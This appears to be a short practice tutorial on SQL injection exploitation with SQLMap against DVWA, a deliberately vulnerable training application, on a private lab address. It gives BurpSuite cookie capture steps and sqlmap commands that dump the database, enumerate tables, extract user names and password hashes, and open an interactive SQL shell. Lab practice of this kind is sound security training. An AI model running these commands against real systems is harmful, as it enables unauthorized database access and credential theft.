SQLMap: SQL Injection Exploitation

Practice on using SQLMap to detect and exploit SQL injection vulnerabilities on DVWA in low security mode.

1. Get Cookies with BurpSuite

Open BurpSuite → Proxy → Intercept. Enable interception and navigate to DVWA to capture the session cookie.

2. Dump All Information

sudo sqlmap \
  -u "http://10.0.2.4/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" \
  --cookie "security=low; PHPSESSID=9ben154elh1p2k3258ugb89r16" \
  -a

3. Current Database and User

sudo sqlmap [url] [cookie] --current-db --current-user

4. Enumerate Columns

sudo sqlmap [url] [cookie] -D dvwa -T users --columns

5. Dump Users and Passwords

sudo sqlmap [url] [cookie] -D dvwa -T users -C user,password --dump

6. Interactive SQL Shell

sudo sqlmap [url] [cookie] -D dvwa --sql-shell